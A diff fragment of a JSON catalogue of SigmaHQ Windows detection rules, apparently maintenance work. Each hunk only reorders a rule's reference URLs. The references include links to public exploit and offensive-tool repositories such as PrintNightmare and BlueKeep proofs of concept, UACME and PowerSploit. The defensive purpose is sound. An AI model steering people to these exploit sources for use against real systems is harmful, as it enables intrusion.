"https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml" ], "tags": [ @@ -9840,11 +9840,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/DidierStevens/status/1217533958096924676", - "https://nullsec.us/windows-event-log-audit-cve/", - "https://twitter.com/VM_vivisector/status/1217190929330655232", "https://twitter.com/FlemmingRiis/status/1217147415482060800", + "https://nullsec.us/windows-event-log-audit-cve/", "https://www.youtube.com/watch?v=ebmW42YYveI", + "https://twitter.com/DidierStevens/status/1217533958096924676", + "https://twitter.com/VM_vivisector/status/1217190929330655232", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml" ], "tags": [ @@ -10003,8 +10003,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", - "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" ], "tags": [ @@ -10233,8 +10233,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", "https://twitter.com/moti_b/status/1032645458634653697", + "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml" ], "tags": [ @@ -10307,10 +10307,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://winaero.com/enable-openssh-server-windows-10/", - "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", + "https://winaero.com/enable-openssh-server-windows-10/", + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" ], @@ -10335,9 +10335,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://twitter.com/fuzzyf10w/status/1410202370835898371", "https://github.com/afwu/PrintNightmare", "https://github.com/hhlxf/PrintNightmare", - "https://twitter.com/fuzzyf10w/status/1410202370835898371", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml" ], "tags": [ @@ -10405,8 +10405,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", + "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" ], "tags": [ @@ -10556,8 +10556,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e", "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", + "https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" ], "tags": [ @@ -10719,10 +10719,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://isc.sans.edu/diary/22264", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml" ], "tags": [ @@ -10892,9 +10892,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/malmoeb/status/1535142803075960832", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" ], "tags": [ @@ -10928,8 +10928,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/malmoeb/status/1535142803075960832", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" ], "tags": [ @@ -10963,8 +10963,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://ngrok.com/", "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://ngrok.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" ], "tags": [ @@ -10998,8 +10998,8 @@ "logsource.product": "windows", "refs": [ "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://twitter.com/gentilkiwi/status/861641945944391680", "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", + "https://twitter.com/gentilkiwi/status/861641945944391680", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml" ], "tags": [ @@ -11587,8 +11587,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" ], @@ -11682,8 +11682,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/Ekultek/BlueKeep", "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/Ekultek/BlueKeep", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" ], "tags": [ @@ -11715,8 +11715,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", "https://www.secura.com/blog/zero-logon", + "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" ], "tags": [ @@ -12102,8 +12102,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml" ], "tags": [ @@ -12330,8 +12330,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml" ], "tags": [ @@ -12365,8 +12365,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" ], @@ -13101,8 +13101,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server_analytic/win_dns_analytic_apt_gallium.yml" ], "tags": [ @@ -13244,11 +13244,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", + "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427", "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c", "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" ], "tags": [ @@ -13290,10 +13290,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "Internal Research", - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_appx_package_installation.yml" ], "tags": [ @@ -13316,10 +13316,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "Internal Research", - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_package_locations.yml" ], "tags": [ @@ -13342,9 +13342,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/", - "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_mal_appx_names.yml" ], "tags": [ @@ -13367,10 +13367,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "Internal Research", - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_domains.yml" ], "tags": [ @@ -13393,10 +13393,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "Internal Research", - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_uncommon_package_locations.yml" ], "tags": [ @@ -13647,8 +13647,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" ], "tags": [ @@ -13959,9 +13959,9 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://adepts.of0x.cc/netsh-portproxy-code/", "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://www.dfirnotes.net/portproxy_detection/", + "https://adepts.of0x.cc/netsh-portproxy-code/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" ], "tags": [ @@ -13996,9 +13996,9 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", - "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", "https://persistence-info.github.io/Data/recyclebin.html", + "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", + "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" ], "tags": [ @@ -14057,8 +14057,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" ], "tags": [ @@ -14359,8 +14359,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/eset/malware-ioc/tree/master/oceanlotus", "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://github.com/eset/malware-ioc/tree/master/oceanlotus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" ], "tags": [ @@ -14384,8 +14384,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", + "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" ], "tags": [ @@ -14764,10 +14764,10 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", "https://github.com/hfiref0x/UACME", - "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", + "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", + "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" ], "tags": [ @@ -15007,8 +15007,8 @@ "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", "http://woshub.com/how-to-clear-rdp-connections-history/", + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" ], "tags": [ @@ -15115,11 +15115,11 @@ "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", "https://docs.microsoft.com/en-us/windows/win32/shell/launch", - "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/7", + "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" ], "tags": [ @@ -15176,8 +15176,8 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", + "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" ], "tags": [ @@ -15325,10 +15325,10 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", - "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", + "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" ], @@ -15353,8 +15353,8 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/amsi.html", "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", + "https://persistence-info.github.io/Data/amsi.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml" ], "tags": [ @@ -15575,8 +15575,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", "https://persistence-info.github.io/Data/htmlhelpauthor.html", + "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml" ], "tags": [ @@ -15825,13 +15825,13 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" ], "tags": [ @@ -15917,8 +15917,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", "https://persistence-info.github.io/Data/wer_debugger.html", + "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" ], "tags": [ @@ -16030,8 +16030,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" ], "tags": [ @@ -16055,9 +16055,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", "https://twitter.com/inversecos/status/1494174785621819397", + "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml" ], "tags": [ @@ -16177,8 +16177,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" @@ -16262,8 +16262,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" ], "tags": [ @@ -16370,9 +16370,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/gtworek/PSBits/tree/master/SIP", "https://persistence-info.github.io/Data/codesigning.html", "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", + "https://github.com/gtworek/PSBits/tree/master/SIP", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" ], "tags": [ @@ -16672,8 +16672,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" ], "tags": [ @@ -16741,8 +16741,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" ], "tags": [ @@ -16790,8 +16790,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml" ], "tags": [ @@ -16874,8 +16874,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", 